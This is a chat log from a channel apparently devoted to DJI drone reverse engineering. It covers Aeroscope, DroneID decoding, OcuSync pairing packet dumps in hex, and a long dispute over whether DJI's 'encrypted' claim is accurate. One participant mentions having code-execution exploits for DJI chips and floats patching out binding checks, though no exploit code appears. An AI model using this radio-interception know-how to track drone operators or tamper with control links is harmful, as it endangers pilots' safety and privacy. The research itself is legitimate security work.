and it has 16 characters instead of the "normal" 14.
[2022-01-13 14:54:46]
atlantic :
I do not know what starts with 4AEC.
[2022-01-13 15:18:58]
atlantic :
According to a country's aircraft register, that includes drones, starting with 4G is Mavic 2 Enterprise Advanced.
[2022-01-13 15:43:43]
lapse98 :
Interesting. I’ll do some more research on those flights. Thank you
[2022-01-14 18:27:57]
the_lord :
@brbaron its mini SE
[2022-01-20 03:05:38]
buckram :
buckram joined the channel.
[2022-01-25 13:51:21]
masskrug :
masskrug joined the channel.
[2022-01-26 14:31:09]
skyninja :
Is it possible to connect an Aeroscope stationary unit to your own server (so no DJI cloud or no DJI on-prem server)? An Aeroscope needs a certificate to connect to a server. Can you install your own certificate, or will it check if the certificate is signed by some DJI authority? Anyone having experience connecting an Aeroscope to your own server?
[2022-01-26 14:39:16]
the_lord :
@skyninja please check PM
[2022-01-26 22:21:40]
pingspike :
damn… is the answer a secret?
[2022-01-27 13:08:15]
the_lord :
sorry @pingspike , its not a secret, yes it is possible to develop your own software to integrate Aeroscope to your own server without DJI's software
[2022-01-31 08:46:33]
jackmax :
jackson joined the channel.
[2022-02-01 15:33:53]
skyninja :
On a mobile Aeroscope, the built-in CrystalSky screen is connected to the Aeroscope using a USB cable. When we start up the mobile Aeroscope and start the Aeroscope application on the screen, the Link LED remains red and it is not working. We pull the USB cable and then re-insert it. The Link goes green and everything works fine. So we always do this on start up. Now we want to use the Aeroscope remotely via a remote desktop app, so we can't go to the site to pull the USB cable. Do others have this also?
[2022-02-01 18:16:36]
the_lord :
yes all aeroscope mobiles do the same
[2022-02-01 18:32:15]
skyninja :
I found a solution. If you reboot the CrystalSky via a terminal (I used SSHelper), after reboot, the problem is gone and the led is green.
[2022-02-01 18:38:26]
the_lord :
because the reboot connects the CS after the AS boot
[2022-02-07 15:22:40]
markus83 :
markus83 joined the channel.
[2022-02-09 18:17:08]
bepeta8783 :
bepeta8783 joined the channel.
[2022-02-10 23:49:49]
heijningen007 :
heijningen007 joined the channel.
[2022-02-17 23:38:11]
mutantroar :
Anybody know what drone models have the serial number that starts with 4DTS?
[2022-02-18 01:35:06]
jackxorjack :
jackxorjack joined the channel.
[2022-02-18 15:31:34]
the_lord :
its Mini SE
[2022-02-21 13:43:23]
alex112233 :
alex112233 joined the channel.
[2022-02-22 15:38:40]
dkovar :
I'm looking at AS data from several vendors. Sanity check - the DroneID is the serial number printed on the label of the drone detected by the AS? I have a vendor that says it is the FC's serial number but that doesn't match.
[2022-02-22 16:15:18]
the_lord :
your vendor is correct, the serial number you are seeing in AS data is the FC's SN
old model drones (P3, P4, In1,...) FC SN doesn't match the label
newer models MP, M2, ... label SN is FC SN
[2022-02-22 16:17:35]
the_lord :
also In1 and P3 droneID doesn't contain home or pilot location
[2022-02-22 16:21:50]
dkovar :
Thank you very much.
[2022-02-22 16:51:39]
the_lord :
just checked old data, some droneID packets of old models contain home location
[2022-02-22 17:14:54]
markus83 :
droneid
[2022-02-22 17:49:15]
dkovar :
I'm seeing the information evolve over time. And some AS integrators then do weird things with the data.
[2022-02-22 19:20:44]
atlantic :
you can see the FC serial number in the about tab of the DJI Go 4 app.
[2022-02-22 19:21:38]
pingspike :
are you saying newer models don't?
[2022-02-22 19:27:00]
the_lord :
I'm talking about old models, some droneID packets of old models contain home location and some don't
all new models I saw contain home location
[2022-02-23 15:00:49]
pingspike :
ahhhh right
[2022-02-23 15:01:02]
pingspike :
that makes more sense
[2022-02-27 15:45:45]
tmbinc :
@nopexecutor do you understand enough of the Ocusync protocol to understand what prevents, say, a WM150 from binding with a RCS231?
As far as I know, DJI uses all-custom sets of firmware but that's probably mostly laziness (and attempting to minimize test matrices) on their side. We have sufficient exploits to run arbitrary code on both S1 and P1 based chips so if we could "nop out" the checks during binding to allow arbitrary bindings (potentially with selecting the right CP firmware), that would be super-interesting.
[2022-02-27 16:05:54]
nopexecutor :
Hmm, as of now I don't know enough to say what blocks it, but it may be not that hard to at least start some investigation. I've seen neither RCS231 nor WM150 communication. WM150 = FPV air unit, RCS231 = mini2 / FPV RC?
[2022-02-27 16:07:55]
nopexecutor :
I've seen MA2, P4Pv2 full comms, from the moment of binding, can decode both. For Mavic 2 I've seen the middle of transmission, can decode those also (still, similarly as in previous - mostly DL side, apart from small exceptions)
[2022-02-27 16:08:54]
nopexecutor :
I have no samples of 40MHz BW transmission from FPV, so no idea if the decode of that comes easily or not
[2022-02-27 16:10:58]
nopexecutor :
If you have samples of natural binding process of RC231 and WM150 with their native counterparts I can try to decode it and extract PDUs/ control messages / DUML / whatever channels they have. Also looking at an attempt of this hybrid binding may give some clues
[2022-02-27 16:30:25]
nopexecutor :
hm, or is RCS231 == RC231 (MA2 RC)?
[2022-02-27 16:31:07]
nopexecutor :
(no access to my files now, laptop busy collecting russian mil comms :P )
[2022-02-28 15:31:57]
tmbinc :
Yeah RCS231 == RC231, i.e. an S1-based WM231 remote. (There were attempts to build a P1-based RC231 but that never happened/was never released)
[2022-02-28 15:32:48]
tmbinc :
I'll try to get a sample of RC231 pairing with something
[2022-02-28 15:37:56]
nopexecutor :
I've seen RC231 pairing with Mavic Air 2
[2022-02-28 15:39:02]
nopexecutor :
pairing & initial sync after both are turned on. I haven't seen any captures related to WM150
[2022-02-28 15:39:56]
nopexecutor :
typically the drone / air unit starts the transmission after it is turned on; the RC joins when it detects DL signal
[2022-02-28 15:53:57]
tmbinc :
Can you share the PDU of what the UAV side transmits initially? Does it have any of these IDs?
```
0xE240
0xE331
0xE811
0xE607
0xB420
0xE500
0xE231
0x1803
0xE170
```
[2022-02-28 15:56:43]
tmbinc :
They vaguely look like DJI devices - WM240 (mavic 2), WM331 (P4), ZV811 (old glasses), ??, PM420 (inspire), AG500 (agras), WM231 (MA-2), ??, FPV
[2022-02-28 17:39:11]
nopexecutor :
Quick check doesn't show those values... at least in init transmission, I'll need to recheck the pairing process. Hm, some example of initial DL communication of already paired rc231 <-> MA2:
[2022-02-28 17:39:14]
nopexecutor :
chId: 2 seqNbr: 130 size: 8 data: 080702017201007c
chId: 2 seqNbr: 131 size: 8 data: 080702017201007c
chId: 2 seqNbr: 132 size: 29 data: 111c02d13f3f000000000000003f0100010000003f3f0000000000002d
chId: 2 seqNbr: 133 size: 29 data: 121c02d13f3f0000000000003f3f0000000000003f3f000000000000a6
chId: 2 seqNbr: 134 size: 29 data: 111c02603f3f00000000000001000100010000003f3f00000000000040
chId: 2 seqNbr: 135 size: 29 data: 111c02603f3f00000000000002010100010000003f3f0000000000004d
chId: 2 seqNbr: 136 size: 25 data: 101802d137073505395132260100000037073505010000001f
chId: 2 seqNbr: 137 size: 19 data: 0e1202000e0c0000000000020100504cff7fc2
chId: 2 seqNbr: 138 size: 29 data: 111c02d13f3f00000000000003020100010000003f3f00000000000037
chId: 2 seqNbr: 139 size: 29 data: 111c02603f3f00000000000004030100010000003f3f00000000000057
chId: 2 seqNbr: 140 size: 29 data: 111c02603f3f00000000000005040100010000003f3f00000000000070
chId: 2 seqNbr: 141 size: 14 data: 090d0201391200000002010000b6
chId: 2 seqNbr: 142 size: 19 data: 0e120a00060c0000000000020100504cff7fbf
chId: 2 seqNbr: 143 size: 29 data: 111c02603f3f00000000000006050100010000003f3f0000000000007d
chId: 2 seqNbr: 145 size: 29 data: 111c02603f3f00000000000007060100010000003f3f00000000000068
chId: 2 seqNbr: 146 size: 29 data: 121c02603f3f0000000000003f3f0000000000003f3f000000000000c9
chId: 2 seqNbr: 147 size: 29 data: 111c02603f3f00000000000008070100010000003f3f00000000000063
chId: 2 seqNbr: 148 size: 29 data: 111c02603f3f00000000000009080100010000003f3f00000000000020
chId: 2 seqNbr: 149 size: 29 data: 111c02003f3f0000000000000a090100010000003f3f000000000000fa
chId: 2 seqNbr: 150 size: 29 data: 111c02003f3f0000000000000b0a0100010000003f3f000000000000ef
chId: 2 seqNbr: 152 size: 29 data: 111c02603f3f0000000000000d0c0100010000003f3f00000000000010
chId: 2 seqNbr: 153 size: 29 data: 111c02003f3f0000000000000e0d0100010000003f3f000000000000ca
chId: 2 seqNbr: 154 size: 29 data: 111c02003f3f0000000000000f0e0100010000003f3f000000000000df
chId: 2 seqNbr: 155 size: 29 data: 111c02603f3f000000000000100f0100010000003f3f0000000000000b
chId: 2 seqNbr: 156 size: 29 data: 121c02003f3f0000000000003f3f0000000000003f3f0000000000001e
chId: 2 seqNbr: 157 size: 29 data: 111c02003f3f00000000000011100100010000003f3f00000000000057
chId: 2 seqNbr: 158 size: 29 data: 111c02003f3f00000000000012110100010000003f3f0000000000005a
chId: 2 seqNbr: 159 size: 29 data: 111c02003f3f00000000000013120100010000003f3f0000000000004f
chId: 2 seqNbr: 160 size: 29 data: 111c02603f3f00000000000014130100010000003f3f00000000000097
chId: 2 seqNbr: 161 size: 29 data: 111c02603f3f00000000000015140100010000003f3f000000000000b0
chId: 2 seqNbr: 162 size: 29 data: 111c02603f3f00000000000016150100010000003f3f000000000000bd
chId: 2 seqNbr: 163 size: 29 data: 111c02603f3f00000000000017160100010000003f3f000000000000a8
chId: 2 seqNbr: 164 size: 29 data: 111c02003f3f00000000000019170100030000003f3f00000000000028
chId: 2 seqNbr: 165 size: 36 data: 1a238201000000000000000300000041f7d607b08b1da696373ffc8902f33be9113c41e8
[2022-02-28 17:40:07]
nopexecutor :
this is just one channel, there is another control one sending mostly the same stuff all the time, up to the point of drone & RC sync (with sporadic freq change requests)
[2022-02-28 17:40:56]
nopexecutor :
from that point on encrypted communication starts, DUML & video channels also get active
[2022-02-28 17:46:18]
nopexecutor :
hm, in the first longer pairing packet I can see "31e2" -> maybe 0xe231, meaning MA2?
[2022-02-28 17:46:41]
nopexecutor :
I would need to x-check what is the rest of the packet before sharing...
[2022-03-02 06:39:24]
alex1122334432 :
alex1122334432 joined the channel.
[2022-03-03 15:05:42]
gh :
ghartabc joined the channel.
[2022-03-13 09:02:35]
zgvs2 :
zgvs2 joined the channel.
[2022-03-15 05:04:33]
valtgun :
valtgun joined the channel.
[2022-03-20 07:33:35]
zwon :
zwon joined the channel.
[2022-03-23 14:56:44]
skyninja :
Maybe a bit off topic, but related to rev eng and drone metadata. There are some videos on Internet from the Russian Orlan-10 drone. On the top and bottom of the frame, there is a black/white pixel bar. I assume this is their way to encode digital metadata (where is the drone flying, what is its sensor point of interest, etc) in an analog video transmission. It seems like 4 lines of 184 (not entirely sure) "pixels". It starts with a pattern 0101010101010101. It ends with 16 bits that change a lot, probably that is some form of CRC or checksum. I "demodulated" the "pixels" to bits. I am now trying to find out what is used for checksum/CRC16 in the last bits. But so far I have not been successful. Have other people looked at this?
[2022-03-23 14:59:15]
skyninja :
These are the bytes I extract from a video clip. 4 times 184 bits concatenated. Every line is a different frame.
[2022-03-23 15:00:51]
skyninja :
I assume black = 0, white = 1, because there are long lines of black, assuming all zeros. Also assume no scrambler, because of the long black lines.
[2022-03-23 19:55:38]
konraditurbe :
konraditurbe joined the channel.
[2022-03-23 20:02:38]
hostile :
hostile joined the channel.
[2022-03-23 20:22:37]
loaderbull :
loaderbull joined the channel.
[2022-03-23 22:20:46]
uskve :
uskve joined the channel.
[2022-03-24 04:11:41]
mrbou :
mrbou joined the channel.
[2022-03-24 04:31:48]
seraph1573 :
seraph1573 joined the channel.
[2022-03-24 05:33:20]
hostile :
@skyninja ... this outta help. Before I drag the channel back on topic. https://twitter.com/Crypt0s/status/1506727236631674882
[2022-03-24 05:33:31]
hostile :
https://twitter.com/d0tslash/status/1506724514490732551?s=20&t=Ka9mGV6PFqumQhWURkUWAQ
[2022-03-24 05:37:42]
hostile :
Ok now, back on topic with Aeroscope...
[2022-03-24 05:40:54]
hostile :
Does anyone have this AeroScope CrystalSky firmware image all extracted, decrypted, whatever? I'm lazy. https://docs.djicdn.com/Products+info/ZS600C_V2597.zip
[2022-03-24 05:44:25]
hostile :
So reading the backlog it seems several of you had varying degrees of success decoding the LightBridge or OcuSync DroneID packets with an SDR? DJI is claiming in this article that DroneID is "encrypted". https://www.theverge.com/22985101/dji-aeroscope-ukraine-russia-drone-tracking. I reached out to the journo and said that was not correct last I knew. DJI engineering reasserted that it *was*.
[2022-03-24 05:45:09]
hostile :
https://twitter.com/d0tslash/status/1506689838216581125
[2022-03-24 05:46:25]
hostile :
On the Enhanced Wifi, when I wrote that paper, they 100% were not "encrypted". When did that change? Or is it just a misunderstanding?
[2022-03-24 05:47:09]
hostile :
I personally suspect it to be them not understanding their own hardware / marketing: "Data Security – All data transmitted through OcuSync 2.0 is encrypted using the leading AES-256 standard, ensuring critical mission information is protected and can only be accessed by authorized parties." https://www.dji.com/newsroom/news/dji-improves-enterprise-drones-and-fleet-management-software-to-enable-next-level-commercial-drone-operations
[2022-03-24 05:48:30]
hostile :
I understand DroneID to be both unencrypted, and broadcast parallel to the actual encrypted c2 link. If it wasn't they'd have to be offering vendors decryption keys in their 'open' standard in order to receive the packets. AeroScope would similarly have to have keys. Now I agree they should maybe try signing the packets, but that is a different story. They are not encrypted, correct?
[2022-03-24 05:48:44]
hostile :
@icer come read this backlog...
[2022-03-24 06:57:20]
skyninja :
drone id in ocusync is not encrypted.
[2022-03-24 06:58:17]
hostile :
any non-subjective proof? DJI is arguing otherwise
[2022-03-24 07:00:18]
skyninja :
yes, i can demodulate it so i know it.
[2022-03-24 07:02:05]
skyninja :
droneid is a different signal on a different frequency than uplink and downlink. it is a frame transmitted every 640 ms. A frame is around 600 us.
[2022-03-24 07:20:06]
skyninja :
if you send an RF sample, i will demodulate it for you, then you know it is true.
[2022-03-24 07:48:34]
skyninja :
i think they see it just like wi-fi, wi-fi is AES encrypted but the management beacon frame is not. but generally speaking wi-fi is encrypted.
[2022-03-24 08:02:21]
the_lord :
Yes WiFi is encrypted but the droneID beacon over WiFi is not, unless they consider the DUML an encryption :D
[2022-03-24 08:47:44]
thatdroneguy-uk :
thatdroneguy-uk joined the channel.
[2022-03-24 09:27:01]
skyninja :
The article in The Verge seems to have softened its wording. The word "encrypted" is now removed for the most part.
[2022-03-24 09:44:19]
konraditurbe :
don't see why it matters that it's encrypted, dji keeps saying this thinking it matters, don't the Russians have aeroscope HW *with the (supposed) decryption key*? The problem is proliferation of these things due to dealers with no scruples.
[2022-03-24 09:47:05]
skyninja :
The best mitigation: don't use DJI drones. :grinning:
[2022-03-24 11:11:48]
dkovar :
Speaking as Kovar, for the purposes of the general public, it is encrypted. You need an SDR, and then you need to extract the data, and then you need to make sense of it. Like the early logs, the data is probably encoded and not encrypted. It is certainly not broadcast "in the clear". Getting into this sort of nuance in the article wasn't going to happen.
That said, I would love to see how it is decoded for human consumption so that I can communicate this correctly the next time.
And, finally, the real problem is that a) the data is in the C2 link and b) anyone, and particularly a nation state, can extract it if they want. Encrypted, or encoded, or just difficult to get really isn't the issue.
[2022-03-24 11:12:47]
dkovar :
Proving that DJI got their language "wrong" is all well and good but preventing the "feature" from working is much more important.
[2022-03-24 11:15:26]
dkovar :
And lest anyone thinks I turned into a DJI fanboy, that is hardly the case. I am more interested in accurately describing a wide variety of issues relating to DJI -and many other firms- and trying to align policy and regulation with the facts rather than with politician's desires to score points.
[2022-03-24 11:17:09]
dkovar :
DUML is encoding, not encryption. DUML within Wifi is pretty close to encryption for the vast majority of the population. Technically it is not encrypted, for the purposes of an article for the general public, the data is encrypted.
[2022-03-24 11:26:08]
konraditurbe :
If the data is in the C2 link, could an Aeroscope unit theoretically extract the video feed? Or are those DUML packets not within reach?
[2022-03-24 12:14:06]
skyninja :
From 1-1-2023 every drone with CE label above 250g needs to transmit drone id. Of course this was not designed with using consumer drones for warfare in mind.
[2022-03-24 12:14:26]
skyninja :
In the European Union.
[2022-03-24 12:16:02]
konraditurbe :
Wonder what the EU ruling says about exceptions to this rule. Anybody with a smartphone can see your drone location.
[2022-03-24 12:17:02]
dkovar :
The US RemoteID requirement is scheduled for 2023 as well. There is a lawsuit trying to stop it, we'll see.
Can "anyone with a smartphone" really see your location? That is certainly a huge concern with RemoteID. It is supposed to be available only to LE.
[2022-03-24 12:18:00]
skyninja :
Yes within line of sight and propagation limits.
[2022-03-24 12:22:22]
konraditurbe :
Check video I sent to general
[2022-03-24 12:22:39]
konraditurbe :
not your (rc) location but rather drone location
[2022-03-24 12:36:35]
hostile :
sorry I fell asleep! did I miss anything fun here?
[2022-03-24 12:38:44]
hostile :
'for the purposes of the general public, it is encrypted. You need a SDR, and then you need to extract the data, and then you need to make sense of it.' @dkovar respectfully, that isn't encrypted. At best it is "encoded". =] I can see the confusion. But being laypeople doesn't make something magically be encrypted because you don't understand it. One could say that "Spanish" is encrypted English by that logic. From an EW standpoint there is a huge difference between encoding and encryption.
[2022-03-24 12:39:27]
hostile :
'It is certainly not broadcast "in the clear".' encoded data that is hard to decipher for a layperson is *still* "in the clear" from a pedantically technical standpoint.
[2022-03-24 12:40:18]
hostile :
' a) the data is in the C2 link' also to be clear it is parallel to the c2 link run over the same pipe.
[2022-03-24 12:41:25]
hostile :
But yes... they obviously said it was encrypted to soften the data / privacy issue and make it less of a concern. They are technically, and factually incorrect in that regard. It is indeed a parallel issue amongst the other concerns.
[2022-03-24 12:42:19]
hostile :
"If the data is in the C2 link, can theoretically an Aeroscope unit be able to extract the video feed?", nailed it @konraditurbe. I don't think they understand their own protocols enough to get a Chinese to English translation out to Adam. IMHO.
[2022-03-24 12:42:40]
hostile :
do you have any details on this lawsuit David? I'd be keen to know more about that.
[2022-03-24 12:42:46]
konraditurbe :
It's all just too confusing
[2022-03-24 12:43:17]
hostile :
*intentionally* IMHO. To make it look less ominous than it is. "We only give it to police! and it's encrypted, why worry!?"
[2022-03-24 13:10:22]
dkovar :
Pedantically technical is fine in this environment. It is counter productive when talking with the public, regulators, or lawmakers.
DJI understands their own protocols very well. Adam probably does not. Even if he does, he suffers from the same problem that I do - making a deeply technical issue simple enough for a journalist to convey to the public.
Arguing, or doing presentations about, encrypted vs not will only engage with people who care about those fine details. If you want to effect change, you need to communicate in broader terms.
With that in mind, I stand by my statement that, for almost everyone, the data is encrypted.
[2022-03-24 13:10:39]
dkovar :
The lawsuit is Race Day Quads vs FAA.
[2022-03-24 13:12:48]
dkovar :
It is confusing because it IS confusing. Lots of moving parts, different versions, interactions, etc. Any normal person will have konraditurbe's response - it is all too confusing. And if you go there, you've lost them. If you lose the audience you are trying to convince because of nuance and technical details then much of your effort is wasted.
[2022-03-24 13:14:23]
hostile :
"It is counterproductive when talking with the public, regulators, or lawmakers." to have DJI bald-faced lie to people's faces and claim their technology is encrypted as some sort of risk mitigation? I'd argue otherwise.
[2022-03-24 13:14:41]
konraditurbe :
Yet it doesn't make it any less right to say it's encrypted, hinting at some sort of key derivation, vs encoded, which anyone*** (yes technical people) can get decoded with hostile's code.
[2022-03-24 13:14:58]
hostile :
I've also argued with DJI about IF exploiting lightbridge was possible. Their engineers told Brendan it was impossible. So I'm not entirely sure they actually do in all cases understand their own shit TBH.
[2022-03-24 13:15:30]
hostile :
doing a presentation about it... lol no. I simply want the words that come out their mouths to be accurate. Period.
[2022-03-24 13:16:36]
hostile :
"If you want to effect change, you need to communicate in broader terms." just like DJI did... by flat out lying and making their tech seem less of a privacy invasion. I get it. Speaking softly and spreading bullshit is how they got to be the king of DroneID in the first place. That isn't the issue I'm addressing however. I'm just simply checking off boxes.
[2022-03-24 13:16:59]
hostile :
This is just like them trying to say Sentinel & Supervisor was a program that didn't exist, and was only a proposal. It's softening of a larger issue with words.
[2022-03-24 13:17:19]
konraditurbe :
@hostile @dkovar how does "Anatomy of DJI Drone Identification Implementation" stand up to today's DJI Aeroscope packets? Any changes? (Apart from travelling on the "c2 link")
[2022-03-24 13:17:26]
hostile :
"I stand by my statement that, for almost everyone, the data is encrypted." you should not hang your hat there David. It is technically inaccurate, period.
[2022-03-24 13:17:31]
dkovar :
We've wanted to change their words for years. I am deeply exhausted. It is a fight with no effect. Far better to expend limited resources on efforts that might have a positive outcome.
[2022-03-24 13:17:48]
hostile :
I'll stand by my words that you are in essence proclaiming that Spanish is Encrypted for English speakers...
[2022-03-24 13:18:12]
dkovar :
Then I'll walk away and cool off. Back later.
[2022-03-24 13:18:58]
hostile :
As I understand Konrad there are some new fields.
[2022-03-24 13:20:28]
hostile :
All I'm asking @dkovar is for you not to be their useful idiot in this case. It is a completely small issue over all, but the words do matter. Spinning encoding, and complexity in understanding packet format is not encryption. On the other hand your early log file example, actually was proper AES encryption. These are fundamentally different concepts. As subject matter experts we can't be out here reciting that encoding is encryption. It makes us look like we don't know what we are talking about.
[2022-03-24 13:21:09]
hostile :
It makes it look like WE are the ones spreading misinformation, or disinformation. When in reality it is them. Not factually understanding how something works is one thing. Saying something is something it flat out isn't is another.
[2022-03-24 13:33:31]
speatuk :
speatuk joined the channel.
[2022-03-24 13:38:27]
hostile :
just to wrap this up before I go back to thinking proper technical. The reason *why* it matters isn't because of regulation. Pay very close attention to the question that was pitched, and how the 'encrypted' thing was used to lessen the overall privacy concern.
[2022-03-24 13:40:44]
hostile :
in essence the argument to the common man, or layperson, is: "It is encrypted, and only good guys can read it". Why they want to pitch that image is a completely different topic. Could be as simple as they don't want to invest more $$ and engineering time into solving a regulatory headache. Occam's & Hanlon's razors are on their side. It isn't necessarily intentionally nefarious, but I guarantee you from this point on, "DroneID is encrypted" will be recited as a reason for regulators to not have concern. Could even be used against the dude with the lawsuit as a reason to shut down his argument.
[2022-03-24 13:41:23]
hostile :
thanks for sharing that I had not seen it at all. https://www.racedayquads.com/pages/rdq-vs-faa
[2022-03-24 13:41:59]
hostile :
https://twitter.com/lawfareblog/status/1478134577025724420
[2022-03-24 13:46:21]
hostile :
in fact directly applicable against their argument.
[2022-03-24 13:46:52]
hostile :
https://jrupprechtlaw.com/racedayquads-llc-v-faa-lawsuit-challenging-drone-remote-identification-regulations/
[2022-03-24 13:47:53]
hostile :
damn I missed all of this! https://www.youtube.com/watch?v=2gymmeXH9YI
[2022-03-24 13:50:43]
hostile :
https://www.youtube.com/watch?v=pfxJRoHOfsw&t=4470s
[2022-03-24 14:54:32]
skyninja :
In the EU drones have to transmit a drone id in an open protocol using easily receivable protocols such as wifi and Bluetooth Long Range. So it is designed so that every citizen can see what drone is hovering above his house. It transmits the operator id that every drone operator needs to register. So the law chooses this above privacy. Just like AIS for ships. Just like ADS-B for planes. We can wait for someone to introduce the adsbexchange equivalent for drones. So from a privacy standpoint the current DJI solution using a proprietary but unencrypted drone id is more privacy friendly than the law from 1-1-2023 onwards.
[2022-03-24 15:05:09]
skyninja :
Is it a good idea to use consumer drones for artillery adjustments and for recce missions? Well, you accept a known risk if you use DJI drones. The DJI privacy statement that you accept when you start using the product, and that the whole world can read on their website, says that your drone transmits drone ids. The Aeroscope product is on the public website. So it is no secret. You accept a risk when you use these consumer drones for military purposes. Can't blame DJI for this. Drone id was made to give law enforcement a tool to keep drones away from airports, prison smuggling and critical infrastructure. Buy a Parrot Anafi with FLIR thermal and your problem is gone.
[2022-03-24 15:06:23]
hostile :
FWIW ADS-B can be disabled by the pilot, and often is.
[2022-03-24 15:26:10]
skyninja :
AIS can be switched off as well.
[2022-03-24 16:04:14]
dkovar :
You tend to have a very clear "either for or against" approach; people are either with you or against you. The term "useful idiot" is an example, it allows for little room for other perspectives and approaches. It also really pisses me off and requires me to step back, cool down, and reengage.
The identifying data is not transmitted in the clear or encrypted, it is somewhere in the middle. Determining where it is, and why, requires a lot of time and careful choice of language. I know from a lot of direct experience that getting into that level of detail outside of a long form presentation or this sort of forum is essentially impossible.
We can choose to argue about the exact term and never achieve consensus. Perhaps we can agree that the average person cannot obtain that data and move on?
Most knowledgeable readers or listeners will know that there is a level of detail below "encryption" and will engage on those details if necessary. That engagement opens up opportunities to further educate and move the discussion forward.
The less knowledgeable are harder to reach via this sort of article. What term would you use to describe the protections around the identifying data? "Unencrypted" is probably correct but due to how the data is communicated it is also not transmitted in the clear.
[2022-03-24 16:08:04]
dkovar :
"It isn't necessarily intentionally nefarious, but I guarantee you from this point on, "DroneID is encrypted" will be recited as a reason for regulators to not have concern. "
Ukraine is raising visibility about AeroScopes tremendously. And, when RemoteID comes out, what DJI does, or does not do, will be much less of an issue.
What regulators -should- be concerned about this? What DJI is already doing is what the FAA will require -everyone- to do.
[2022-03-24 16:09:02]
hostile :
"The identifying data is not transmitted in the clear or encrypted, it is somewhere in the middle." Something is either encrypted or not. How can it be in the middle? "we can agree that the average person cannot obtain that data and move on?" I staunchly disagree, on your definition of 'average'.
[2022-03-24 16:09:58]
hostile :
the article reaches just fine without adding the false claim of encryption seeking to minimize the privacy exposure. The common person we speak of is fooled into thinking "no privacy issue" *shrug*.
[2022-03-24 16:12:28]
hostile :
regulation is a tangential issue to the overall privacy impact. Speaking factually about minor details only maintains credibility IMHO. It isn't a huge thing to beat a dead horse over. It is pretty black and white. I'm honestly confused as to how technically we can be discussing any grey area between something being encrypted, vs not. Is there a key or a shared secret, or any secret used? yes, or no. That is your answer.
[2022-03-24 16:13:00]
hostile :
with DJI as the largest proliferator of drones, yea what they do does matter. Not from a regulation standpoint, but still from a privacy standpoint.
[2022-03-24 16:13:47]
hostile :
I'm in my basement working right now props off. No one needs to have my DJI product GPS location broadcast to them for ANY reason. *period*. And the fact is ANYONE layperson included can receive the packets, even if it is *difficult* for them to interpret them.
[2022-03-24 16:13:58]
hostile :
the layperson can't decode ADS-B, but that can go to flighttrader....
[2022-03-24 16:14:17]
hostile :
https://twitter.com/d0tslash/status/1499515429198434317?s=20&t=SS5GTwM1eXNDm5glbqOSVQ
[2022-03-24 16:14:55]
hostile :
I'm *pretty* sure the police heli turned off their ADS for their own privacy... because I was live tweeting them following the convoy. This is very similar privacy wise.
[2022-03-24 16:15:46]
hostile :
ANY idiot can see those packets from that heli with the right tool put in their hand, because they are not encrypted. DJI droneID implementation in current form is the same. other vendors may be as well at the end of the day. There is lots of discussion to be had on IF this is ok vs. not.
[2022-03-24 16:16:15]
dkovar :
We can technically discuss the fine details here and I absolutely agree with you. When discussing it with a journalist who is trying to reach a broad audience, I will take a different approach.
[2022-03-24 16:19:00]
hostile :
for me... the approach for that journalist was to simply omit that claim
[2022-03-24 16:19:14]
hostile :
adding only harmed credibility, and minimized potential impact to "good guys"
[2022-03-24 16:19:26]
hostile :
that is literally all this discussion is about
[2022-03-24 16:20:20]
hostile :
if we need to help the common person understand that reading the encoded data takes a special skill, or for someone to release a public tool, that is fine, but making it sound not possible due to *encryption* is not a good foot for us to be standing on.
[2022-03-24 16:20:28]
dkovar :
No, that is literally all your discussion is about. That article covered a broad range of topics. How available the data is was only a small piece of it.
[2022-03-24 16:21:14]
hostile :
the fact remains that I also helped release Kismet in public open source format so that literally anyone could receive the information. Kismet will run on an Android phone. so in specific cases, at the very least the wifi enhanced drones, it is already a reality.
[2022-03-24 16:21:31]
hostile :
"No, that is literally all your discussion is about." what room are we in David? The aeroscope drone ID room.
[2022-03-24 16:21:39]
hostile :
I've literally been back ONE day...
[2022-03-24 16:21:57]
hostile :
I also discussed that the article claimed that the sentinel / supervisor program didn't exist.
[2022-03-24 16:22:10]
hostile :
meanwhile I have written accounts of people that worked in it, and had access to the data.
[2022-03-24 16:22:22]
hostile :
those were the only two points in the article that I felt needed to be addressed... the rest of it was fine.
[2022-03-24 16:22:47]
hostile :
Imma get back to the technical side of the house. I'll eventually provide the public tools to back up my statement, and move on.
[2022-03-24 16:25:01]
hostile :
it's not a big deal, but I do think we need to be careful dumbing down commentary. And this is a "useful idiot" situation 100%, that wasn't meant to be offensive. It's simply the nature of the term. I could have used a different one, but the fact is you making that comment furthered an agenda that only the "good guys" have access to droneID information, and as such the general public should not worry about their privacy. That stance is hard to debate.
[2022-03-24 16:25:55]
hostile :
now on the technical side of the house, I did at least get my HackRF up and receiving wifi data. So time to work on getting the 1/4 rate enhanced wifi beacons detected with gnuradio.
[2022-03-24 16:59:37]
skyninja :
A screenshot of gnuradio a day keeps the doctor away
[2022-03-24 17:00:32]
skyninja :
Any reason you do this with gnuradio instead of setting a wifi chip to 5 MHz channel width?
[2022-03-24 17:01:53]
skyninja :
For wifi you have to start with Schmidl-Cox to find the start of frame
[2022-03-24 17:17:02]
hostile :
because only certain wifi chips support this. A small subset of atheros chips.
[2022-03-24 17:17:25]
hostile :
no USB wifi chips support it.
[2022-03-24 17:17:55]
hostile :
skyninja I read above you were capturing droneID from OcuSync? how far along did you get with that?
[2022-03-24 17:18:12]
hostile :
I'd like to get back to a point where kismet can properly support these packets not just wifi.
[2022-03-24 17:18:40]
fredmicrowave :
FWIW , Universal Radio Hacker software is really nice
[2022-03-24 17:19:17]
fredmicrowave :
https://github.com/jopohl/urh
[2022-03-24 17:20:05]
fredmicrowave :
Works with HackRF ofc
[2022-03-24 17:23:05]
hostile :
I have hackrf sitting next to me. Yeah I'm just more keen on if @skyninja was able to take droneID samples and decode them to serialnum / gps loc?
[2022-03-24 17:31:06]
hostile :
looking back I think @tmbinc & @nopexecutor had some similar successes.
[2022-03-24 17:32:01]
droneuser :
@hostile At the time that you wrote your white paper, DroneID did broadcast in parallel to the C2 link. Now, I am under the impression that they switched to embedding it into the C2 link; however, the packet format is still the same. If you still have an aeroscope mobile unit, you can check on the UART for log messages when a drone is detected - it will list the protocol it detects (Wi-Fi, lightbridge, ocusync) and the RF module/antenna number
[2022-03-24 17:32:15]
fredmicrowave :
I tried with URH before but could not figure out a way to get useful info from it. I still have too much to learn.
I have also got a HackRF Mayhem/PortaPack, which is great for portable tests.
[2022-03-24 17:32:48]
hostile :
what gives you the impression that it is now embedded in the link? Doesn't that imply they can fully decode the c2 stream at will? (video and stick data too).
[2022-03-24 17:33:21]
droneuser :
yeah the internals have all the hardware to decode the C2 stream
[2022-03-24 17:33:46]
hostile :
that would be a blatant security issue... and implies AeroScope could inject DUML at will.
[2022-03-24 17:34:30]
hostile :
